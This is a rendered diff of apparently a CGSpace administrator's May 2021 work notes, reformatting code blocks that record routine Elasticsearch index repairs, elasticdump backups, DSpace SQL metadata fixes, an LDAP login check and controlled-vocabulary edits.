                                                                                                                                                                                                                                                                                                                                                          +        "aliases": {
                                                                                                                                                                                                                                                                                                                                                          +            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                                          +        }
                                                                                                                                                                                                                                                                                                                                                          +    },
                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                          • I think they look OK (openrxv-items is an alias of openrxv-items-final), but I took a backup just in case:
                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                          $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                                          -$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                            $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                                            +$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                            • Then I started an indexing in the AReS Explorer admin dashboard
                                                                                                                                                                                                                                                                                                                                                            • The indexing finished, but it looks like the aliases are messed up again:
                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                            $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                            -yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
                                                                                                                                                                                                                                                                                                                                                            -yellow open openrxv-items-final      d0tbMM_SRWimirxr_gm9YA 1 1    937      0   2.2mb   2.2mb
                                                                                                                                                                                                                                                                                                                                                            -

                                                                                                                                                                                                                                                                                                                                                            2021-05-05

                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                            $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                            +yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
                                                                                                                                                                                                                                                                                                                                                            +yellow open openrxv-items-final      d0tbMM_SRWimirxr_gm9YA 1 1    937      0   2.2mb   2.2mb
                                                                                                                                                                                                                                                                                                                                                            +

                                                                                                                                                                                                                                                                                                                                                            2021-05-05

                                                                                                                                                                                                                                                                                                                                                            • Peter noticed that we no longer display cg.link.reference on the item view
                                                                                                                                                                                                                                                                                                                                                                @@ -229,9 +229,9 @@ yellow open openrxv-items-final d0tbMM_SRWimirxr_gm9YA 1 1 937 0
                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                            $ time ~/dspace64/bin/dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                            -~/dspace64/bin/dspace index-discovery -b  4053.24s user 53.17s system 38% cpu 2:58:53.83 total
                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                              $ time ~/dspace64/bin/dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                              +~/dspace64/bin/dspace index-discovery -b  4053.24s user 53.17s system 38% cpu 2:58:53.83 total
                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                              • Nope! Still slow, and still no mapped item…
                                                                                                                                                                                                                                                                                                                                                                • I even tried unmapping it from all collections, and adding it to a single new owning collection…
                                                                                                                                                                                                                                                                                                                                                                • @@ -244,53 +244,53 @@ yellow open openrxv-items-final d0tbMM_SRWimirxr_gm9YA 1 1 937 0
                                                                                                                                                                                                                                                                                                                                                                • The indexes on AReS Explorer are messed up after last week’s harvesting:
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                                -yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
                                                                                                                                                                                                                                                                                                                                                                -yellow open openrxv-items-final      d0tbMM_SRWimirxr_gm9YA 1 1    937      0   2.2mb   2.2mb
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                -$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                -    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                                                -        "aliases": {}
                                                                                                                                                                                                                                                                                                                                                                -    },
                                                                                                                                                                                                                                                                                                                                                                -    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                                                -        "aliases": {
                                                                                                                                                                                                                                                                                                                                                                -            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                                                -        }
                                                                                                                                                                                                                                                                                                                                                                -    }
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                                  +yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
                                                                                                                                                                                                                                                                                                                                                                  +yellow open openrxv-items-final      d0tbMM_SRWimirxr_gm9YA 1 1    937      0   2.2mb   2.2mb
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  +$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                                                  +...
                                                                                                                                                                                                                                                                                                                                                                  +    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                                                  +        "aliases": {}
                                                                                                                                                                                                                                                                                                                                                                  +    },
                                                                                                                                                                                                                                                                                                                                                                  +    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                                                  +        "aliases": {
                                                                                                                                                                                                                                                                                                                                                                  +            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                                                  +        }
                                                                                                                                                                                                                                                                                                                                                                  +    }
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  • openrxv-items should be an alias of openrxv-items-final
                                                                                                                                                                                                                                                                                                                                                                  • I made a backup of the temp index and then started indexing on the AReS Explorer admin dashboard:
                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                  $ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                                                                                                                                                                                                  -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-temp-backup
                                                                                                                                                                                                                                                                                                                                                                  -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                                                                                                                                                                                                                  -

                                                                                                                                                                                                                                                                                                                                                                  2021-05-10

                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  $ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                                                                                                                                                                                                  +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-temp-backup
                                                                                                                                                                                                                                                                                                                                                                  +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                                                                                                                                                                                                                  +

                                                                                                                                                                                                                                                                                                                                                                  2021-05-10

                                                                                                                                                                                                                                                                                                                                                                  • Amazing, the harvesting on AReS finished but it messed up all the indexes and now there are no items in any index!
                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                  $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                                  -yellow open openrxv-items-temp        8thRX0WVRUeAzmd2hkG6TA 1 1      0     0    283b    283b
                                                                                                                                                                                                                                                                                                                                                                  -yellow open openrxv-items-temp-backup _0tyvctBTg2pjOlcoVP1LA 1 1 104165 20134 305.5mb 305.5mb
                                                                                                                                                                                                                                                                                                                                                                  -yellow open openrxv-items-final       BtvV9kwVQ3yBYCZvJS1QyQ 1 1      0     0    283b    283b
                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                    $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                                    +yellow open openrxv-items-temp        8thRX0WVRUeAzmd2hkG6TA 1 1      0     0    283b    283b
                                                                                                                                                                                                                                                                                                                                                                    +yellow open openrxv-items-temp-backup _0tyvctBTg2pjOlcoVP1LA 1 1 104165 20134 305.5mb 305.5mb
                                                                                                                                                                                                                                                                                                                                                                    +yellow open openrxv-items-final       BtvV9kwVQ3yBYCZvJS1QyQ 1 1      0     0    283b    283b
                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                    • I fixed the indexes manually by re-creating them and cloning from the backup:
                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                    $ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                    -$ curl -X PUT "localhost:9200/openrxv-items-temp-backup/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                                                                                                                                                                                                    -$ curl -s -X POST http://localhost:9200/openrxv-items-temp-backup/_clone/openrxv-items-final
                                                                                                                                                                                                                                                                                                                                                                    -$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                                                    -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp-backup'
                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                      $ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                      +$ curl -X PUT "localhost:9200/openrxv-items-temp-backup/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                                                                                                                                                                                                      +$ curl -s -X POST http://localhost:9200/openrxv-items-temp-backup/_clone/openrxv-items-final
                                                                                                                                                                                                                                                                                                                                                                      +$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                                                      +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp-backup'
                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                      • Also I ran all updated on the server and updated all Docker images, then rebooted the server (linode20):
                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                      $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                        $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                        • I backed up the AReS Elasticsearch data using elasticdump, then started a new harvest:
                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                        $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                                                        -$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                          $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                                                          +$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                          • Discuss CGSpace statistics with the CIP team
                                                                                                                                                                                                                                                                                                                                                                            • They were wondering why their numbers for 2020 were so low
                                                                                                                                                                                                                                                                                                                                                                            • @@ -329,10 +329,10 @@ $ elasticdump --input=http://localhost:9200/o
                                                                                                                                                                                                                                                                                                                                                                            • I checked the CLARISA list against ROR’s April, 2020 release (“Version 9”, on figshare, though it is version 8 in the dump):
                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                            $ ./ilri/ror-lookup.py -i /tmp/clarisa-institutions.txt -r ror-data-2021-04-06.json -o /tmp/clarisa-ror-matches.csv
                                                                                                                                                                                                                                                                                                                                                                            -$ csvgrep -c matched -m 'true' /tmp/clarisa-ror-matches.csv | sed '1d' | wc -l
                                                                                                                                                                                                                                                                                                                                                                            -1770
                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                              $ ./ilri/ror-lookup.py -i /tmp/clarisa-institutions.txt -r ror-data-2021-04-06.json -o /tmp/clarisa-ror-matches.csv
                                                                                                                                                                                                                                                                                                                                                                              +$ csvgrep -c matched -m 'true' /tmp/clarisa-ror-matches.csv | sed '1d' | wc -l
                                                                                                                                                                                                                                                                                                                                                                              +1770
                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                              • With 1770 out of 6230 matched, that’s 28.5%…
                                                                                                                                                                                                                                                                                                                                                                              • I sent an email to Hector Tobon to point out the issues in CLARISA again and ask him to chat
                                                                                                                                                                                                                                                                                                                                                                              • Meeting with GARDIAN developers about CG Core and how GARDIAN works
                                                                                                                                                                                                                                                                                                                                                                              • @@ -341,11 +341,11 @@ $ csvgrep -c matched -m 'true' /tmp/c
                                                                                                                                                                                                                                                                                                                                                                                • Fix a few thousand IWMI URLs that are using HTTP instead of HTTPS on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                localhost/dspace63= > UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://www.iwmi.cgiar.org','https://www.iwmi.cgiar.org', 'g') WHERE text_value LIKE 'http://www.iwmi.cgiar.org%' AND metadata_field_id=219;
                                                                                                                                                                                                                                                                                                                                                                                -UPDATE 1132
                                                                                                                                                                                                                                                                                                                                                                                -localhost/dspace63= > UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://publications.iwmi.org','https://publications.iwmi.org', 'g') WHERE text_value LIKE 'http://publications.iwmi.org%' AND metadata_field_id=219;
                                                                                                                                                                                                                                                                                                                                                                                -UPDATE 1803
                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                  localhost/dspace63= > UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://www.iwmi.cgiar.org','https://www.iwmi.cgiar.org', 'g') WHERE text_value LIKE 'http://www.iwmi.cgiar.org%' AND metadata_field_id=219;
                                                                                                                                                                                                                                                                                                                                                                                  +UPDATE 1132
                                                                                                                                                                                                                                                                                                                                                                                  +localhost/dspace63= > UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://publications.iwmi.org','https://publications.iwmi.org', 'g') WHERE text_value LIKE 'http://publications.iwmi.org%' AND metadata_field_id=219;
                                                                                                                                                                                                                                                                                                                                                                                  +UPDATE 1803
                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                  • In the case of the latter, the HTTP links don’t even work! The web server returns HTTP 404 unless the request is HTTPS
                                                                                                                                                                                                                                                                                                                                                                                  • IWMI also says that their subjects are a subset of AGROVOC so they no longer want to use cg.subject.iwmi for their subjects
                                                                                                                                                                                                                                                                                                                                                                                      @@ -367,67 +367,67 @@ UPDATE 1803
                                                                                                                                                                                                                                                                                                                                                                                      • I have to fix the Elasticsearch indexes on AReS after last week’s harvesting because, as always, the openrxv-items index should be an alias of openrxv-items-final instead of openrxv-items-temp:
                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                      $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                                                                      -    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                                                                      -        "aliases": {}
                                                                                                                                                                                                                                                                                                                                                                                      -    },
                                                                                                                                                                                                                                                                                                                                                                                      -    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                                                                      -        "aliases": {
                                                                                                                                                                                                                                                                                                                                                                                      -            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                                                                      -        }
                                                                                                                                                                                                                                                                                                                                                                                      -    },
                                                                                                                                                                                                                                                                                                                                                                                      -...
                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                        $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                                                                        +    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                                                                        +        "aliases": {}
                                                                                                                                                                                                                                                                                                                                                                                        +    },
                                                                                                                                                                                                                                                                                                                                                                                        +    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                                                                        +        "aliases": {
                                                                                                                                                                                                                                                                                                                                                                                        +            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                                                                        +        }
                                                                                                                                                                                                                                                                                                                                                                                        +    },
                                                                                                                                                                                                                                                                                                                                                                                        +...
                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                        • I took a backup of the openrxv-items index with elasticdump so I can re-create them manually before starting a new harvest tomorrow:
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                        -$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                                        -

                                                                                                                                                                                                                                                                                                                                                                                        2021-05-16

                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                        $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                        +$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                                        +

                                                                                                                                                                                                                                                                                                                                                                                        2021-05-16

                                                                                                                                                                                                                                                                                                                                                                                        • I deleted and re-created the Elasticsearch indexes on AReS:
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        $ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                        -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                        -$ curl -XPUT 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                        -$ curl -XPUT 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                        -$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          $ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                          +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                          +$ curl -XPUT 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                          +$ curl -XPUT 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                          +$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          • Then I re-imported the backup that I created with elasticdump yesterday:
                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                          $ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                          -$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000 
                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                            $ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                            +$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000 
                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                            • Then I started a new harvest on AReS

                                                                                                                                                                                                                                                                                                                                                                                            2021-05-17

                                                                                                                                                                                                                                                                                                                                                                                            • The AReS harvest finished and the Elasticsearch indexes seem OK so I shouldn’t have to fix them next time…
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                            $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                                                            -yellow open openrxv-items-temp       o3ijJLcyTtGMOPeWpAJiVA 1 1      0 0    283b    283b
                                                                                                                                                                                                                                                                                                                                                                                            -yellow open openrxv-items-final      TrJ1Ict3QZ-vFkj-4VcAzw 1 1 104317 0 259.4mb 259.4mb
                                                                                                                                                                                                                                                                                                                                                                                            -$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                                                                            -    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                                                                            -        "aliases": {}
                                                                                                                                                                                                                                                                                                                                                                                            -    },
                                                                                                                                                                                                                                                                                                                                                                                            -    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                                                                            -        "aliases": {
                                                                                                                                                                                                                                                                                                                                                                                            -            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                                                                            -        }
                                                                                                                                                                                                                                                                                                                                                                                            -    },
                                                                                                                                                                                                                                                                                                                                                                                            -...
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                                                              +yellow open openrxv-items-temp       o3ijJLcyTtGMOPeWpAJiVA 1 1      0 0    283b    283b
                                                                                                                                                                                                                                                                                                                                                                                              +yellow open openrxv-items-final      TrJ1Ict3QZ-vFkj-4VcAzw 1 1 104317 0 259.4mb 259.4mb
                                                                                                                                                                                                                                                                                                                                                                                              +$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                                                                              +    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                                                                              +        "aliases": {}
                                                                                                                                                                                                                                                                                                                                                                                              +    },
                                                                                                                                                                                                                                                                                                                                                                                              +    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                                                                              +        "aliases": {
                                                                                                                                                                                                                                                                                                                                                                                              +            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                                                                              +        }
                                                                                                                                                                                                                                                                                                                                                                                              +    },
                                                                                                                                                                                                                                                                                                                                                                                              +...
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              • Abenet said she and some others can’t log into CGSpace
                                                                                                                                                                                                                                                                                                                                                                                                • I tried to check the CGSpace LDAP account and it does seem to be not working:
                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                              $ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-ldap@cgiarad.org" -W "(sAMAccountName=aorth)"
                                                                                                                                                                                                                                                                                                                                                                                              -Enter LDAP Password: 
                                                                                                                                                                                                                                                                                                                                                                                              -ldap_bind: Invalid credentials (49)
                                                                                                                                                                                                                                                                                                                                                                                              -        additional info: 80090308: LdapErr: DSID-0C090453, comment: AcceptSecurityContext error, data 532, v3839
                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                $ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-ldap@cgiarad.org" -W "(sAMAccountName=aorth)"
                                                                                                                                                                                                                                                                                                                                                                                                +Enter LDAP Password: 
                                                                                                                                                                                                                                                                                                                                                                                                +ldap_bind: Invalid credentials (49)
                                                                                                                                                                                                                                                                                                                                                                                                +        additional info: 80090308: LdapErr: DSID-0C090453, comment: AcceptSecurityContext error, data 532, v3839
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                • I sent a message to Biruk so he can check the LDAP account
                                                                                                                                                                                                                                                                                                                                                                                                • IWMI confirmed that they do indeed want to move all their subjects to AGROVOC, so I made the changes in the XMLUI and config (#467)
                                                                                                                                                                                                                                                                                                                                                                                                    @@ -446,14 +446,14 @@ ldap_bind: Invalid credentials (49)
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                $ xmllint --xpath '//value-pairs[@value-pairs-name="ccafsprojectpii"]/pair/stored-value/node()' dspace/config/input-forms.xml
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  $ xmllint --xpath '//value-pairs[@value-pairs-name="ccafsprojectpii"]/pair/stored-value/node()' dspace/config/input-forms.xml
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  • I formatted the input file with tidy, especially because one of the new project tags has an ampersand character… grrr:
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                  $ tidy -xml -utf8 -m -iq -w 0 dspace/config/input-forms.xml      
                                                                                                                                                                                                                                                                                                                                                                                                  -line 3658 column 26 - Warning: unescaped & or unknown entity "&WA_EU-IFAD"
                                                                                                                                                                                                                                                                                                                                                                                                  -line 3659 column 23 - Warning: unescaped & or unknown entity "&WA_EU-IFAD"
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                    $ tidy -xml -utf8 -m -iq -w 0 dspace/config/input-forms.xml      
                                                                                                                                                                                                                                                                                                                                                                                                    +line 3658 column 26 - Warning: unescaped & or unknown entity "&WA_EU-IFAD"
                                                                                                                                                                                                                                                                                                                                                                                                    +line 3659 column 23 - Warning: unescaped & or unknown entity "&WA_EU-IFAD"
                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                    • After testing whether this escaped value worked during submission, I created and merged a pull request to 6_x-prod (#468)

                                                                                                                                                                                                                                                                                                                                                                                                    2021-05-18

                                                                                                                                                                                                                                                                                                                                                                                                    @@ -461,34 +461,34 @@ line 3659 column 23 - Warning: unescaped & or unknown entity "&WA_EU
                                                                                                                                                                                                                                                                                                                                                                                                  • Paola from the Alliance emailed me some new ORCID identifiers to add to CGSpace
                                                                                                                                                                                                                                                                                                                                                                                                  • I saved the new ones to a text file, combined them with the others, extracted the ORCID iDs themselves, and updated the names using resolve-orcids.py:
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                  $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/new | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-05-18-combined.txt
                                                                                                                                                                                                                                                                                                                                                                                                  -$ ./ilri/resolve-orcids.py -i /tmp/2021-05-18-combined.txt -o /tmp/2021-05-18-combined-names.txt
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                    +
